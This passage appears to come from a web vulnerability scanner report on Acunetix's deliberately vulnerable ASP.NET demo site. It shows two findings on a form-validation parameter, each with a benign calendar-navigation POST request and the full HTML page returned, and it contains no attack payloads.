style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8429&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAy8OLAdsIZGRkkDA%2F6txHVG5TwYnajgfcHT4L8kI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKBm8mOAwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBc%2FEAifmgnb2aqeUGlOjPtsARNx1
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:34 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAy8OLAdsIZGRkkDA/6txHVG5TwYnajgfcHT4L8kI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKBm8mOAwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBc/EAifmgnb2aqeUGlOjPtsARNx1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:White" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1141 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,141 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8434&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA25d5BdsIZGRkdU5iIndUbxZOMVFM8%2BuQn7D2x%2BI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKBmavxDQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYz%2BidfQxlQHz%2BKVvcg5CYmGTPMe
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:27 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDA25d5BdsIZGRkdU5iIndUbxZOMVFM8+uQn7D2x+I=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKBmavxDQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBYz+idfQxlQHz+KVvcg5CYmGTPMe" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:White" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 